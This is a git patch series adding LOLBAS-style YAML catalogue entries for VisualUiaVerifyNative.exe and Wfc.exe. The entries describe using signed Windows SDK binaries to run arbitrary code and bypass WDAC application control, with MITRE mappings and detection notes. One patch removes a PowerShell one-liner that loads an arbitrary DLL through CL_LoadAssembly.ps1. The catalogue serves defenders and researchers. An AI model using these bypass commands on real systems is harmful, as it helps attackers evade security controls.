diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml new file mode 100644 index 0000000..dafea55 --- /dev/null +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -0,0 +1,31 @@ +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml new file mode 100644 index 0000000..8542015 --- /dev/null +++ b/yml/OtherMSBinaries/Wfc.yml @@ -0,0 +1,28 @@ +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file From 741d0f7b360028191a04a3eac4ea4215cf53f635 Mon Sep 17 00:00:00 2001 From: bohops Date: Sun, 26 Sep 2021 23:35:01 -0400 Subject: [PATCH 19/19] Update CL_LoadAssembly.yml --- yml/OSScripts/CL_LoadAssembly.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4bc7719..81e37cd 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -24,7 +24,3 @@ Acknowledgement: - Person: Jimmy Handle: '@bohops' --- - - - -powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file